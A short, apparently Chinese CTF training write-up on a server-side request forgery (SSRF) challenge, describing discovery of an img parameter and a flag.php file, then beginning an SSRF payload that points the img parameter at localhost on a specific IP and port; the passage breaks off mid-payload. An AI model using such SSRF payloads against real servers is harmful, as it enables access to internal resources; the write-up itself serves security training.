8月3日ssrf漏洞解析訓練

第一題 題目: 思路: 點擊logo獲取以下界面 分析: 本題連接暴漏兩個問題,一是flag.php在根目錄下(緣由前面的index.php就在根目錄下,通常的話二者在同一目錄下);二是img參數(所以須要構造對應的img連接,而後造成破損圖片並保存)php 步驟一: 構造payload:web http://39.71.44.204:21029/index.php?img=Http://127.
相關文章
相關標籤/搜索